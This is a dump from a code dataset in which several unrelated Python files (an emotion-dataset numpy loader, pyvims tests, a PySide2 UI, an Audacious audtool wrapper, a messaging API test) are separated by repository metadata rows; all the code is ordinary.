print ('[INFO] Loading data from numpy arrays...')
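    # Each split provides two input streams (entire image and cropped body);
    # the valence/arousal/dominance targets are identical for both streams,
    # so the same annotation .npy files are loaded for both.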
x_entire_train = np.load(main_numpy_dir + 'X_train/x_entire_train.npy')
x_cropped_train = np.load(main_numpy_dir + 'X_train/x_cropped_train.npy')
valence_entire_train = np.load(main_numpy_dir + 'Y_train/valence_train.npy')
valence_cropped_train = np.load(main_numpy_dir + 'Y_train/valence_train.npy')
arousal_entire_train = np.load(main_numpy_dir + 'Y_train/arousal_train.npy')
arousal_cropped_train = np.load(main_numpy_dir + 'Y_train/arousal_train.npy')
dominance_entire_train = np.load(main_numpy_dir + 'Y_train/dominance_train.npy')
dominance_cropped_train = np.load(main_numpy_dir + 'Y_train/dominance_train.npy')
x_entire_val = np.load(main_numpy_dir + 'X_train/x_entire_val.npy')
x_cropped_val = np.load(main_numpy_dir + 'X_train/x_cropped_val.npy')
valence_entire_val = np.load(main_numpy_dir + 'Y_train/valence_val.npy')
valence_cropped_val = np.load(main_numpy_dir + 'Y_train/valence_val.npy')
arousal_entire_val = np.load(main_numpy_dir + 'Y_train/arousal_val.npy')
arousal_cropped_val = np.load(main_numpy_dir + 'Y_train/arousal_val.npy')
dominance_entire_val = np.load(main_numpy_dir + 'Y_train/dominance_val.npy')
dominance_cropped_val = np.load(main_numpy_dir + 'Y_train/dominance_val.npy')
x_entire_test = np.load(main_numpy_dir + 'X_train/x_entire_test.npy')
x_cropped_test = np.load(main_numpy_dir + 'X_train/x_cropped_test.npy')
valence_entire_test = np.load(main_numpy_dir + 'Y_train/valence_test.npy')
valence_cropped_test = np.load(main_numpy_dir + 'Y_train/valence_test.npy')
arousal_entire_test = np.load(main_numpy_dir + 'Y_train/arousal_test.npy')
arousal_cropped_test = np.load(main_numpy_dir + 'Y_train/arousal_test.npy')
dominance_entire_test = np.load(main_numpy_dir + 'Y_train/dominance_test.npy')
dominance_cropped_test = np.load(main_numpy_dir + 'Y_train/dominance_test.npy')
print('[INFO] Data have been successfully loaded')
print('---------------------------------------------------------------------------------------------------')
if verbose == 1:
print('x_entire_train shape:', x_entire_train.shape)
print('x_cropped_train shape:', x_cropped_train.shape)
print('valence_entire_train shape:', valence_entire_train.shape)
print('valence_cropped_train shape:', valence_cropped_train.shape)
print('arousal_entire_train shape:', arousal_entire_train.shape)
print('arousal_cropped_train shape:', arousal_cropped_train.shape)
print('dominance_entire_train shape:', dominance_entire_train.shape)
print('dominance_cropped_train shape:', dominance_cropped_train.shape)
print ('---------------------------------------------------------------------------------------------------')
print('x_entire_val shape:', x_entire_val.shape)
print('x_cropped_val shape:', x_cropped_val.shape)
print('valence_entire_val shape:', valence_entire_val.shape)
print('valence_cropped_val shape:', valence_cropped_val.shape)
print('arousal_entire_val shape:', arousal_entire_val.shape)
print('arousal_cropped_val shape:', arousal_cropped_val.shape)
print('dominance_entire_val shape:', dominance_entire_val.shape)
print('dominance_cropped_val shape:', dominance_cropped_val.shape)
print ('---------------------------------------------------------------------------------------------------')
print('x_entire_test shape:', x_entire_test.shape)
print('x_cropped_test shape:', x_cropped_test.shape)
print('valence_entire_test shape:', valence_entire_test.shape)
print('valence_cropped_test shape:', valence_cropped_test.shape)
print('arousal_entire_test shape:', arousal_entire_test.shape)
print('arousal_cropped_test shape:', arousal_cropped_test.shape)
print('dominance_entire_test shape:', dominance_entire_test.shape)
print('dominance_cropped_test shape:', dominance_cropped_test.shape)
print ('---------------------------------------------------------------------------------------------------')
return (x_entire_train, x_cropped_train,valence_entire_train,valence_cropped_train,arousal_entire_train,arousal_cropped_train,dominance_entire_train,dominance_cropped_train), \
(x_entire_val, x_cropped_val, valence_entire_val,valence_cropped_val,arousal_entire_val,arousal_cropped_val,dominance_entire_val,dominance_cropped_val), \
(x_entire_test, x_cropped_test, valence_entire_test,valence_cropped_test,arousal_entire_test,arousal_cropped_test,dominance_entire_test,dominance_cropped_test)
def load_data_from_numpy_single_output(main_numpy_dir,
verbose=1):
print ('[INFO] Loading data from numpy arrays...')
x_image_train = np.load(main_numpy_dir + 'X_train/x_image_train.npy')
x_body_train = np.load(main_numpy_dir + 'X_train/x_body_train.npy')
y_image_train = np.load(main_numpy_dir + 'Y_train/y_train.npy')
y_body_train = np.load(main_numpy_dir + 'Y_train/y_train.npy')
x_image_val = np.load(main_numpy_dir + 'X_train/x_image_val.npy')
x_body_val = np.load(main_numpy_dir + 'X_train/x_body_val.npy')
y_image_val = np.load(main_numpy_dir + 'Y_train/y_val.npy')
y_body_val = np.load(main_numpy_dir + 'Y_train/y_val.npy')
x_image_test = np.load(main_numpy_dir + 'X_train/x_image_test.npy')
x_body_test = np.load(main_numpy_dir + 'X_train/x_body_test.npy')
y_image_test = np.load(main_numpy_dir + 'Y_train/y_test.npy')
y_body_test = np.load(main_numpy_dir + 'Y_train/y_test.npy')
print('[INFO] Data have been successfully loaded')
print('---------------------------------------------------------------------------------------------------')
if verbose == 1:
print('x_image_train shape:', x_image_train.shape)
print('x_body_train shape:', x_body_train.shape)
print('y_image_train shape:', y_image_train.shape)
print('y_body_train shape:', y_body_train.shape)
print ('---------------------------------------------------------------------------------------------------')
print('x_image_val shape:', x_image_val.shape)
print('x_body_val shape:', x_body_val.shape)
print('y_image_val shape:', y_image_val.shape)
print('y_body_val shape:', y_body_val.shape)
print ('---------------------------------------------------------------------------------------------------')
print('x_image_test shape:', x_image_test.shape)
print('x_body_test shape:', x_body_test.shape)
print('y_image_test shape:', y_image_test.shape)
print('y_body_test shape:', y_body_test.shape)
print ('---------------------------------------------------------------------------------------------------')
return (x_image_train, x_body_train,y_image_train,y_body_train), \
(x_image_val, x_body_val, y_image_val,y_body_val), \
(x_image_test, x_body_test,y_image_test,y_body_test)
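
# Usage sketch (the directory path is hypothetical; it must contain the
# X_train/ and Y_train/ subfolders referenced above):
# train, val, test = load_data_from_numpy_single_output('emotic_numpy/', verbose=0)
# x_image_train, x_body_train, y_image_train, y_body_train = train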
| 46.369697 | 180 | 0.656385 | 1,038 | 7,651 | 4.378613 | 0.05973 | 0.075248 | 0.10033 | 0.118812 | 0.445325 | 0.40484 | 0.40484 | 0.384378 | 0.384378 | 0.267547 | 0 | 0.000612 | 0.14534 | 7,651 | 164 | 181 | 46.652439 | 0.694449 | 0.044177 | 0 | 0.163265 | 0 | 0 | 0.361466 | 0.230685 | 0 | 0 | 0 | 0 | 0 | 1 | 0.020408 | false | 0 | 0.020408 | 0 | 0.061224 | 0.5 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 |
1df523cdc41ccb402483976f0573983b6122d8e9 | 4,412 | py | Python | tests/test_vims_pixel.py | seignovert/pyvims | a70b5b9b8bc5c37fa43b7db4d15407f312a31849 | [
"BSD-3-Clause"
] | 4 | 2019-09-16T15:50:22.000Z | 2021-04-08T15:32:48.000Z | tests/test_vims_pixel.py | seignovert/pyvims | a70b5b9b8bc5c37fa43b7db4d15407f312a31849 | [
"BSD-3-Clause"
] | 3 | 2018-05-04T09:28:24.000Z | 2018-12-03T09:00:31.000Z | tests/test_vims_pixel.py | seignovert/pyvims | a70b5b9b8bc5c37fa43b7db4d15407f312a31849 | [
"BSD-3-Clause"
] | 1 | 2020-10-12T15:14:17.000Z | 2020-10-12T15:14:17.000Z | """Test VIMS image module."""
from numpy.testing import assert_array_almost_equal as assert_array
from pytest import approx, fixture, raises
from pyvims import VIMS
from pyvims.errors import VIMSError
@fixture
def img_id():
"""Testing image ID."""
return '1731456416_1'
@fixture
def cube(img_id):
"""Testing cube."""
return VIMS(img_id)
@fixture
def pixel(cube):
"""Testing pixel (ground and specular)."""
return cube[6, 32]
@fixture
def limb_pixel(cube):
"""Testing limb pixel."""
return cube[1, 1]
def test_pixel_err(cube):
"""Test VIMS pixel errors."""
# Invalid sample value
with raises(VIMSError):
_ = cube[0, 1]
with raises(VIMSError):
_ = cube[100, 1]
with raises(TypeError):
_ = cube[1.1, 1]
# Invalid line value
with raises(VIMSError):
_ = cube[1, 0]
with raises(VIMSError):
_ = cube[1, 100]
with raises(TypeError):
_ = cube[1, 1.1]
def test_pixel_properties(pixel):
"""Test VIMS pixel properties (ground and specular)."""
assert pixel == '1731456416_1-S6_L32'
assert pixel != '1731456416_1-S6_L33'
assert pixel.s == 6
assert pixel.l == 32
assert pixel.i == 6 - 1
assert pixel.j == 32 - 1
assert pixel[352] == pixel @ 5.13 == pixel['5.13'] == pixel @ '352'
assert pixel[339:351] == pixel @ '4.91:5.11' == approx(0.162, abs=1e-3)
assert pixel.et == approx(406035298.3, abs=.1)
assert_array(pixel.j2000, [0.7299, 0.3066, -0.6109], decimal=4)
assert pixel.ra == approx(22.79, abs=1e-2)
assert pixel.dec == approx(-37.66, abs=1e-2)
assert pixel.lon == -pixel.lon_e == approx(136.97, abs=1e-2)
assert pixel.lat == approx(80.37, abs=1e-2)
assert pixel.alt == approx(0, abs=1e-2)
assert not pixel.limb
assert pixel.ground
assert pixel.slon == '137°W'
assert pixel.slat == '80°N'
assert pixel.salt == '0 km (Ground pixel)'
assert pixel.inc == approx(67.1, abs=.1)
assert pixel.eme == approx(64.4, abs=.1)
assert pixel.phase == approx(131.5, abs=.1)
assert_array(pixel.sc, [12.25, 31.96], decimal=2)
assert_array(pixel.ss, [185.00, 16.64], decimal=2)
assert pixel.dist_sc == approx(211868.6, abs=.1)
assert pixel.res_s == pixel.res_l == pixel.res == approx(104.9, abs=.1)
assert pixel.is_specular
assert pixel.specular_lon == approx(141.2, abs=.1)
assert pixel.specular_lat == approx(79.25, abs=.1)
assert pixel.specular_angle == approx(65.77, abs=.1)
assert pixel.specular_dist == approx(60.8, abs=.1)
assert len(pixel.spectrum) == len(pixel.wvlns)
assert pixel.wvlns[0] == approx(0.892, abs=1e-3)
assert pixel.spectrum[0] == approx(0.156, abs=1e-3)
def test_limb_pixel_properties_limb(limb_pixel):
"""Test VIMS limb pixel properties (not specular)."""
assert str(limb_pixel) == '1731456416_1-S1_L1'
assert limb_pixel.s == 1
assert limb_pixel.l == 1
assert limb_pixel.i == 0
assert limb_pixel.j == 0
assert limb_pixel.et == approx(406034072.7, abs=.1)
assert_array(limb_pixel.j2000, [0.7384, 0.2954, -0.6062], decimal=4)
assert limb_pixel.ra == approx(21.81, abs=1e-2)
assert limb_pixel.dec == approx(-37.31, abs=1e-2)
assert limb_pixel.lon == approx(251.01, abs=1e-2)
assert limb_pixel.lat == approx(41.17, abs=1e-2)
assert limb_pixel.alt == approx(1893.58, abs=1e-2)
assert limb_pixel.limb
assert not limb_pixel.ground
assert limb_pixel.slon == '109°E'
assert limb_pixel.slat == '41°N'
assert limb_pixel.salt == '1894 km (Limb pixel)'
assert limb_pixel.inc == approx(61.4, abs=.1)
assert limb_pixel.eme == approx(90.0, abs=.1)
assert limb_pixel.phase == approx(131.7, abs=.1)
assert limb_pixel.dist_sc == approx(219698.4, abs=.1)
assert limb_pixel.res == approx(108.7, abs=.1)
assert not limb_pixel.is_specular
def test_pixel_properties_err(pixel):
"""Test VIMS pixel properties errors."""
# Band invalid
with raises(VIMSError):
_ = pixel[1]
with raises(VIMSError):
_ = pixel[353]
# Wavelength invalid
with raises(VIMSError):
_ = pixel @ .5
with raises(VIMSError):
_ = pixel @ 6.
# Invalid index
with raises(VIMSError):
_ = pixel @ (1, 2, 3)
def test_pixel_plot(pixel):
"""Test pixel plot."""
pixel.plot(title='testing')
| 26.739394 | 75 | 0.635086 | 678 | 4,412 | 4.023599 | 0.225664 | 0.120968 | 0.104472 | 0.043988 | 0.273094 | 0.072214 | 0.019062 | 0 | 0 | 0 | 0 | 0.106358 | 0.215775 | 4,412 | 164 | 76 | 26.902439 | 0.680925 | 0.084542 | 0 | 0.147059 | 0 | 0 | 0.037149 | 0 | 0 | 0 | 0 | 0 | 0.578431 | 1 | 0.088235 | false | 0 | 0.039216 | 0 | 0.166667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
1df8beec4fea3bcefebf61482d69a744dbb216ea | 302 | py | Python | apistar/exceptions.py | sylwekb/apistar | 890006884dbb9644824511e0275fa00515204c5b | [
"BSD-3-Clause"
] | null | null | null | apistar/exceptions.py | sylwekb/apistar | 890006884dbb9644824511e0275fa00515204c5b | [
"BSD-3-Clause"
] | null | null | null | apistar/exceptions.py | sylwekb/apistar | 890006884dbb9644824511e0275fa00515204c5b | [
"BSD-3-Clause"
] | null | null | null | class SchemaError(Exception):
def __init__(self, schema, code):
self.schema = schema
self.code = code
msg = schema.errors[code].format(**schema.__dict__)
super().__init__(msg)
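
# Illustrative use (with a hypothetical `schema` object): the message
# template registered under `code` in schema.errors is formatted with the
# schema's own attributes, e.g. raise SchemaError(schema, 'invalid_type').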
class NoCurrentApp(Exception):
pass
class ConfigurationError(Exception):
pass
| 20.133333 | 59 | 0.65894 | 32 | 302 | 5.84375 | 0.5 | 0.106952 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.231788 | 302 | 14 | 60 | 21.571429 | 0.806034 | 0 | 0 | 0.2 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.1 | false | 0.2 | 0 | 0 | 0.4 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
1dfaf8dad72aefecc4b8134cc8efce48a3d16816 | 288 | py | Python | pyslam/thirdparty/disk/submodules/torch-dimcheck/setup.py | dysdsyd/VO_benchmark | a7602edab934419c1ec73618ee655e18026f834f | [
"Apache-2.0"
] | 2 | 2021-09-11T09:13:31.000Z | 2021-11-03T01:39:56.000Z | pyslam/thirdparty/disk/submodules/torch-dimcheck/setup.py | dysdsyd/VO_benchmark | a7602edab934419c1ec73618ee655e18026f834f | [
"Apache-2.0"
] | null | null | null | pyslam/thirdparty/disk/submodules/torch-dimcheck/setup.py | dysdsyd/VO_benchmark | a7602edab934419c1ec73618ee655e18026f834f | [
"Apache-2.0"
] | null | null | null | from setuptools import setup
setup(
name='torch-dimcheck',
version='0.0.1',
description='Dimensionality annotations for tensor parameters and return values',
packages=['torch_dimcheck'],
author='Michał Tyszkiewicz',
author_email='michal.tyszkiewicz@gmail.com',
)
| 26.181818 | 85 | 0.725694 | 33 | 288 | 6.272727 | 0.818182 | 0.125604 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.012346 | 0.15625 | 288 | 10 | 86 | 28.8 | 0.839506 | 0 | 0 | 0 | 0 | 0 | 0.503472 | 0.097222 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.111111 | 0 | 0.111111 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
1dfd962e97e4b42a0882e32bbba5a65998278c73 | 263 | py | Python | task_management/urls.py | AbdelrahmanRabiee/ayenapp | 43fc4f2b5f53ca308cf60c9f1d74cb2e3f4f4b25 | [
"MIT"
] | null | null | null | task_management/urls.py | AbdelrahmanRabiee/ayenapp | 43fc4f2b5f53ca308cf60c9f1d74cb2e3f4f4b25 | [
"MIT"
] | 5 | 2020-06-06T01:47:05.000Z | 2022-02-10T14:05:22.000Z | task_management/urls.py | AbdelrahmanRabiee/ayenapp | 43fc4f2b5f53ca308cf60c9f1d74cb2e3f4f4b25 | [
"MIT"
] | null | null | null | from django.urls import path
from rest_framework import routers
from task_management import viewsets
app_name = "task_management"
urlpatterns = [
]
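# NOTE: urlpatterns is left empty; task_router.urls is presumably included
# from the project-level urlconf.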
task_router = routers.SimpleRouter()
task_router.register(r'tasks', viewsets.TasksViewSet, base_name='tasks') | 18.785714 | 72 | 0.802281 | 34 | 263 | 6 | 0.617647 | 0.137255 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.114068 | 263 | 14 | 72 | 18.785714 | 0.875536 | 0 | 0 | 0 | 0 | 0 | 0.094697 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.375 | 0 | 0.375 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
38005601c897e3e947cdabb62140e650a9ec4e7f | 1,473 | py | Python | audtool/__init__.py | Guaxinim5573/audacious-player | 7bcd2afdd91bb18a41fb70500aaf76eaa17da837 | [
"MIT"
] | null | null | null | audtool/__init__.py | Guaxinim5573/audacious-player | 7bcd2afdd91bb18a41fb70500aaf76eaa17da837 | [
"MIT"
] | 1 | 2021-11-29T16:25:22.000Z | 2021-11-29T16:25:22.000Z | audtool/__init__.py | Guaxinim5573/audacious-player | 7bcd2afdd91bb18a41fb70500aaf76eaa17da837 | [
"MIT"
] | null | null | null | import subprocess
import logging
logger = logging.getLogger(__name__)
# Run a command-line command and return its stdout (trailing newline stripped)
def _run(command):
result = subprocess.run(command, check=True, stdout=subprocess.PIPE, text=True)
result.stdout = result.stdout[:-1]
return result.stdout
def is_playing():
result = subprocess.run(["audtool", "playback-status"], stdout=subprocess.PIPE, text=True)
logger.debug(result.stdout)
if result.returncode == 0 and result.stdout is not None and result.stdout != "stopped":
return True
return False
def status():
return _run(["audtool", "playback-status"])
# Get current song
def get_current_song():
return _run(["audtool", "current-song"])
# Skip to next song
def next():
_run(["audtool", "playlist-advance"])
_run(["audtool", "playback-play"])
def prev():
_run(["audtool", "playlist-reverse"])
_run(["audtool", "playback-play"])
def volume(amount):
_run(["audtool", "set-volume", amount])
def playpause():
_run(["audtool", "playback-playpause"])
# Display all songs in current playlist
def display_songs():
lines = _run(["audtool", "playlist-display"]).splitlines()
    lines.pop() # Removes last item, we don't need that
lines.pop(0) # We also don't need the first item
songs = []
for line in lines:
[pos, name, length] = line.split(" | ")
pos = pos.lstrip()
name = name.rstrip()
songs.append({"name": name, "pos": pos, "length": length})
return songs
def jump(pos):
_run(["audtool", "playlist-jump", pos]) | 26.781818 | 91 | 0.697895 | 201 | 1,473 | 5.019901 | 0.378109 | 0.109019 | 0.089197 | 0.047572 | 0.105055 | 0 | 0 | 0 | 0 | 0 | 0 | 0.002358 | 0.136456 | 1,473 | 55 | 92 | 26.781818 | 0.790881 | 0.129667 | 0 | 0.05 | 0 | 0 | 0.201411 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | false | 0 | 0.05 | 0.05 | 0.45 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
3800ef2480e2344c284a3ea135e2ec8a35e84cfa | 3,377 | py | Python | GiftUi.py | DrPleaseRespect/GiftBox | d39b3b644aa579297315ee3b3cb38c79556682f9 | [
"MIT"
] | null | null | null | GiftUi.py | DrPleaseRespect/GiftBox | d39b3b644aa579297315ee3b3cb38c79556682f9 | [
"MIT"
] | null | null | null | GiftUi.py | DrPleaseRespect/GiftBox | d39b3b644aa579297315ee3b3cb38c79556682f9 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
################################################################################
## Form generated from reading UI file 'GiftUi.ui'
##
## Created by: Qt User Interface Compiler version 5.15.2
##
## WARNING! All changes made in this file will be lost when recompiling UI file!
################################################################################
from PySide2.QtCore import *
from PySide2.QtGui import *
from PySide2.QtWidgets import *
import Resources_rc
class Ui_Form(object):
def setupUi(self, Form):
if not Form.objectName():
Form.setObjectName(u"Form")
Form.resize(373, 261)
sizePolicy = QSizePolicy(QSizePolicy.MinimumExpanding, QSizePolicy.MinimumExpanding)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(Form.sizePolicy().hasHeightForWidth())
Form.setSizePolicy(sizePolicy)
Form.setMinimumSize(QSize(373, 261))
Form.setMaximumSize(QSize(373, 261))
self.gridLayout = QGridLayout(Form)
self.gridLayout.setObjectName(u"gridLayout")
self.verticalLayout_2 = QVBoxLayout()
self.verticalLayout_2.setObjectName(u"verticalLayout_2")
self.horizontalLayout = QHBoxLayout()
self.horizontalLayout.setObjectName(u"horizontalLayout")
self.label = QLabel(Form)
self.label.setObjectName(u"label")
sizePolicy1 = QSizePolicy(QSizePolicy.Preferred, QSizePolicy.Preferred)
sizePolicy1.setHorizontalStretch(0)
sizePolicy1.setVerticalStretch(0)
sizePolicy1.setHeightForWidth(self.label.sizePolicy().hasHeightForWidth())
self.label.setSizePolicy(sizePolicy1)
self.label.setMinimumSize(QSize(200, 200))
self.label.setMaximumSize(QSize(200, 200))
self.label.setSizeIncrement(QSize(100, 100))
self.label.setBaseSize(QSize(100, 100))
self.label.setTextFormat(Qt.RichText)
self.label.setPixmap(QPixmap(u":/GiftIcon/gifticon.png"))
self.label.setScaledContents(True)
self.label.setAlignment(Qt.AlignCenter)
self.label.setMargin(23)
self.label.setIndent(-1)
self.horizontalLayout.addWidget(self.label)
self.label_2 = QLabel(Form)
self.label_2.setObjectName(u"label_2")
self.label_2.setScaledContents(False)
self.label_2.setAlignment(Qt.AlignCenter)
self.horizontalLayout.addWidget(self.label_2)
self.horizontalSpacer = QSpacerItem(40, 20, QSizePolicy.Expanding, QSizePolicy.Minimum)
self.horizontalLayout.addItem(self.horizontalSpacer)
self.verticalLayout_2.addLayout(self.horizontalLayout)
self.pushButton = QPushButton(Form)
self.pushButton.setObjectName(u"pushButton")
self.verticalLayout_2.addWidget(self.pushButton)
self.gridLayout.addLayout(self.verticalLayout_2, 0, 0, 1, 1)
self.retranslateUi(Form)
QMetaObject.connectSlotsByName(Form)
# setupUi
def retranslateUi(self, Form):
Form.setWindowTitle(QCoreApplication.translate("Form", u"Form", None))
self.label.setText("")
self.label_2.setText(QCoreApplication.translate("Form", u"Happy Birthday!!", None))
self.pushButton.setText(QCoreApplication.translate("Form", u"Open Gift!", None))
# retranslateUi
| 37.522222 | 95 | 0.665976 | 336 | 3,377 | 6.64881 | 0.342262 | 0.08863 | 0.026858 | 0.040286 | 0.102954 | 0 | 0 | 0 | 0 | 0 | 0 | 0.030094 | 0.183299 | 3,377 | 89 | 96 | 37.94382 | 0.779913 | 0.066035 | 0 | 0 | 1 | 0 | 0.044646 | 0.007721 | 0 | 0 | 0 | 0 | 0 | 1 | 0.033898 | false | 0 | 0.067797 | 0 | 0.118644 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
3801139345c9a4ae91e8d3ae8ff7f84beeaa380a | 251 | py | Python | telegram_coin_bot/__init__.py | sigmaister/telegram-coin-bot | b14329de8fc86cb135f05d7207f64a00f349cabf | [
"MIT"
] | 17 | 2020-07-17T18:55:27.000Z | 2021-11-20T03:54:01.000Z | telegram_coin_bot/__init__.py | sigmaister/telegram-coin-bot | b14329de8fc86cb135f05d7207f64a00f349cabf | [
"MIT"
] | 5 | 2020-07-17T19:23:06.000Z | 2020-08-11T12:45:14.000Z | telegram_coin_bot/__init__.py | sigmaister/telegram-coin-bot | b14329de8fc86cb135f05d7207f64a00f349cabf | [
"MIT"
] | 10 | 2020-07-17T19:01:40.000Z | 2021-12-18T13:21:55.000Z | __author__ = "Wild Print"
__maintainer__ = __author__
__email__ = "telegram_coin_bot@rambler.ru"
__license__ = "MIT"
__version__ = "0.0.1"
__all__ = (
"__author__",
"__email__",
"__license__",
"__maintainer__",
"__version__",
)
| 15.6875 | 42 | 0.669323 | 23 | 251 | 5.130435 | 0.695652 | 0.186441 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.014778 | 0.191235 | 251 | 15 | 43 | 16.733333 | 0.566502 | 0 | 0 | 0 | 0 | 0 | 0.40239 | 0.111554 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
38028042957e1e98ecf41fea1079a9cdbc4aaca9 | 3,200 | py | Python | tests/backend/message.py | IronMeerkat/genesis | 4a053ae4639a12295be9951905ca69383c1da860 | [
"MIT"
] | null | null | null | tests/backend/message.py | IronMeerkat/genesis | 4a053ae4639a12295be9951905ca69383c1da860 | [
"MIT"
] | null | null | null | tests/backend/message.py | IronMeerkat/genesis | 4a053ae4639a12295be9951905ca69383c1da860 | [
"MIT"
] | null | null | null | import test_agent
print('Logging in')
Meerkat = test_agent.TestAgent(username='meerkat', password='12345678', endpoint='/messages/')
Pangolin = test_agent.TestAgent(username='pangolin', password='12345678', endpoint='/messages/')
Badger = test_agent.TestAgent(username='badger', password='12345678', endpoint='/messages/')
Anon = test_agent.TestAgent(endpoint='/messages/')
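# End-to-end flow under test: Meerkat messages Pangolin; mailbox visibility
# is then checked for the sender, the recipient, an unrelated user (Badger)
# and an anonymous client; finally Pangolin deletes the message and the
# sender's view must remain intact.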
print("Meerkat sending message to Pangolin")
meerkat_sent_message = Meerkat.post(recepient='pangolin', title="Hello Pangolin", body="It's me, Meerkat")
assert meerkat_sent_message.status_code == 201, f'Failed to send message. code: {meerkat_sent_message.status_code}'
print("Checking meerkat's mailboxes")
meerkat_mailbox = Meerkat.get()
assert meerkat_mailbox.json() == [], "Meerkat can see a message"
meerkat_outgoing = Meerkat.get('sender')
assert len(meerkat_outgoing.json()) == 1, "Meerkat can't see an outgoing message"
msg_id = meerkat_outgoing.json()[0]['id']
print("Meerkat's mailboxes passed the initial message test")
print("Checking Pangolin's mailboxes")
pangolin_read_mailbox = Pangolin.get('read')
assert pangolin_read_mailbox.json() == [], "read messages showed up in Pangolin's mailbox"
pangolin_outgoing = Pangolin.get('sender')
assert pangolin_outgoing.json() == [], "Pangolin appears to have an outgoing message"
pangolin_mailbox = Pangolin.get()
assert int(pangolin_mailbox.json()[0]['id']) == msg_id, "No matching message in pangolin's inbox"
message = Pangolin.get(f'{msg_id}').json()
assert message['title'] == "Hello Pangolin" and message['body'] == "It's me, Meerkat", 'Wrong message found'
pangolin_read_mailbox = Pangolin.get('read')
assert len(pangolin_read_mailbox.json()) == 1, "Message not found in read"
print("Pangolin succesfully passed the initial message test")
print("Ensuring Badger is unable to access message")
badger_mail = Badger.get('all')
assert badger_mail.json() == [], "Badger has mail"
badger_message = Badger.get(f'{msg_id}')
assert badger_message.status_code >= 400, 'Badger gained unauthorized access'
print("Badger successfully passed the initial message test")
print("Ensuring Anon is unable to access message")
anon_mail = Anon.get()
assert anon_mail.status_code >= 400, "Anon can see a mailbox"
anon_message = Anon.get(f'{msg_id}')
assert anon_message.status_code >= 400, "Anon can see meerkat's message"
print("Anon passed test")
print('Pangolin deleting message')
deletion = Pangolin.delete(f'{msg_id}')
assert deletion.status_code == 204, "failed to delete"
pangolin_read_mailbox = Pangolin.get('read')
print(pangolin_read_mailbox.json())
assert pangolin_read_mailbox.json() == [], "read messages showed up in Pangolin's mailbox"
pangolin_deleted = Pangolin.get('deleted')
assert len(pangolin_deleted.json()) == 1, "Deleted message does not show up"
print('Pangolin succesfully deleted messages')
print("Ensuring meerkat can still see message")
meerkat_outgoing = Meerkat.get('sender')
assert len(meerkat_outgoing.json()) == 1, "Meerkat can't see an outgoing message"
meerkat_outgoing = Meerkat.get('deleted')
assert meerkat_outgoing.json() == [], "Meerkat sees deleted message"
